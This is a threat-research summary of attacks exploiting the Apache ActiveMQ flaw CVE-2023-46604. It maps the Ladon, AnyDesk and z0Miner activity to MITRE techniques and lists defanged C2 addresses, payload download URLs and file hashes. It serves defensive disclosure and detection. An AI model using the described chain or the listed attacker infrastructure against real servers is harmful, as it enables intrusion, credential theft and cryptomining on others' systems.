Threat Research

Apache ActiveMQ Vulnerability (CVE-2023-46604) Continuously Being Exploited in Attacks – ASEC BLOG

Securonix

Attacks against unpatched Apache ActiveMQ (CVE-2023-46604) continue, with operations attributed to groups like Andariel deploying Ladon, NetCat, AnyDesk, and z0Miner to gain control and execute malware. The report outlines the attack chain—from vulnerability exploitation to remote access, credential theft, and cryptocurrency mining—and recommends patching vulnerable versions and tightening server defenses. #CVE-2023-46604 #Ladon #AnyDesk #z0Miner #Andariel #ApacheActiveMQ

Keypoints

  • CVE-2023-46604 is actively exploited to execute commands on exposed Apache ActiveMQ servers.
  • Andariel, HelloKitty Ransomware, Cobalt Strike, and Metasploit Meterpreter were among early attackers; Ladon, NetCat, AnyDesk, and z0Miner appear in newer campaigns.
  • Ladon is used for scanning, privilege escalation, credential theft, and establishing reverse shells.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Attacker can execute malicious commands from a remote location and take over the target system. Quote: “CVE-2023-46604 is a remote code execution vulnerability in the open-source messaging and integration pattern server Apache ActiveMQ. If an unpatched Apache ActiveMQ is externally exposed, the threat actor can execute malicious commands from a remote location and take over the target system.”
  • [T1046] Network Service Scanning – Ladon offers scanning for the relatively recent CVE-2023-46604 vulnerability. Quote: “Ladon offers scanning for the relatively recent CVE-2023-46604 vulnerability.”
  • [T1059.001] PowerShell – Used to download Ladon and execute reverse shell via a PowerShell command loaded from an XML config. Quote: “a command is configured to use CMD and PowerShell to download Ladon before executing a reverse shell command.”
  • [T1059.003] Windows Command Shell – Used in the same command sequence to download Ladon and trigger reverse shell. Quote: “a command is configured to use CMD and PowerShell to download Ladon before executing a reverse shell command.”
  • [T1105] Ingress Tool Transfer – Tools and payloads are downloaded from external URLs (e.g., Ladon.ps1, poc2.xml). Quote: “Download: hxxp://27.191.193[.]193:555/Ladon.ps1 : Ladon”
  • [T1021.001] Remote Services – Remote administration tools like AnyDesk are used to control compromised systems. Quote: “remote administration tools such as AnyDesk, NetSupport, and Chrome Remote Desktop have recently been used for bypassing security products.”
  • [T1496] Resource Hijacking – Coin miners (XMRig) are installed post-compromise. Quote: “Recently, there were also attack campaigns where XMRig CoinMiner was installed.”
  • [T1003] Credential Access – Ladon features include credential theft as part of its capabilities. Quote: “Major features include scanning, privilege escalation, account credential theft, and reverse shell.”

Indicators of Compromise

  • [IP] C2 addresses – 27.191.193[.]193:50000, 62.233.50[.]97:6666
  • [MD5] eb0e70ea44e578201df1e3c49e905144, 1a7e8e719e29c2cca5083053bb240dbc
  • [MD5] b6e0db27c2b3e62db616b0918a5d8ed8, c1aa596dc33f2ba4aadbd689a1652701
  • [MD5] baeee25ebf0efeec414dce64b9e7aca7, 2a0d26b8b02bb2d17994d2a9a38d61db
  • [URL] hxxp://27.191.193[.]193:555/Ladon.ps1, hxxp://27.191.193[.]193:555/poc2.xml
  • [File] Ladon.ps1, poc2.xml
  • Additional IOCs include other configurations and mining-related files such as paste.xml, paste.ps1, s.rar, and config.json mentioned in the article.

Read more: https://asec.ahnlab.com/en/59904/